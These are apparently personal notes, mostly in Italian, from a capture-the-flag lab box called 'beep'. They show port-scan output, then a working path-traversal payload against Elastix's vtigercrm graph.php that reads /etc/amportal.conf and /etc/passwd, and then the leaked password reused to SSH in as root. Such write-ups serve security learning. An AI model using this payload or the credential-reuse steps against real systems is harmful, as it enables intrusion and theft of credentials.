10.10.10.7


sudo masscan -p1-65535 --rate 1000 --banners --open -e tun0 10.10.10.7

Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-11-16 21:48:18 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 4559/tcp on 10.10.10.7                                    
Discovered open port 995/tcp on 10.10.10.7                                     
Discovered open port 4190/tcp on 10.10.10.7                                    
Discovered open port 22/tcp on 10.10.10.7                                      
Discovered open port 878/tcp on 10.10.10.7                                     
Discovered open port 10000/tcp on 10.10.10.7                                   
Discovered open port 4445/tcp on 10.10.10.7                                    
Discovered open port 111/tcp on 10.10.10.7                                     
Discovered open port 80/tcp on 10.10.10.7                                      
Discovered open port 993/tcp on 10.10.10.7                                     
Discovered open port 3306/tcp on 10.10.10.7                                    
Discovered open port 443/tcp on 10.10.10.7                                     
Discovered open port 143/tcp on 10.10.10.7                                     
Discovered open port 110/tcp on 10.10.10.7                                     
Discovered open port 25/tcp on 10.10.10.7                                      
Discovered open port 5038/tcp on 10.10.10.7

sudo nmap -p 4559,995,4190,22,878,10000,4445,111,80,993,3306,443,143,110,25,5038 -sC -sV 10.10.10.7

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: APOP IMPLEMENTATION(Cyrus POP3 server v2) TOP USER RESP-CODES AUTH-RESP-CODE STLS LOGIN-DELAY(0) UIDL PIPELINING EXPIRE(NEVER)
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            875/udp   status
|_  100024  1            878/tcp   status
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: QUOTA MULTIAPPEND CHILDREN MAILBOX-REFERRALS ANNOTATEMORE THREAD=REFERENCES BINARY URLAUTHA0001 X-NETSCAPE LIST-SUBSCRIBED LISTEXT THREAD=ORDEREDSUBJECT STARTTLS IDLE CONDSTORE ACL NO RENAME Completed CATENATE OK IMAP4rev1 UIDPLUS NAMESPACE SORT=MODSEQ LITERAL+ SORT RIGHTS=kxte IMAP4 UNSELECT ID ATOMIC
443/tcp   open  ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_ssl-date: 2021-11-16T23:00:18+00:00; +1h02m16s from scanner time.
878/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

Host script results:
|_clock-skew: 1h02m15s



https://10.10.10.7:10000/session_login.cgi          //login wembin
https://10.10.10.7/                                 //(ridirezionato da porta 80) elastix access page

di cui si può leggere il file di configurazione grazie a questo exploit:
https://www.exploit-db.com/exploits/37637

basta andare su:

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

AMPDBPASS=jEhdIekWmdjE AMPENGINE=asterisk AMPMGRUSER=admin
AMPMGRPASS=jEhdIekWmdjE

inoltre posso leggere anche /etc/passwd:
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action

e vedo che gli unici utenti con accesso tramite ssh sono root e /home/fanis
provoa d accedere con ssh per vedere se la password è riutilizzata da fanis o da root 

viene effettivamente utilizzata da root e possoa accedere con root e prendere i flag accedendo semplicemente con ssh:
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 root@10.10.10.7                 //-oKexAlgorithms=+diffie-hellman-group1-sha1 necessario perchè la macchina usa protocolli per scambio chiavi legacy e non mi faceva collegare altrimenti




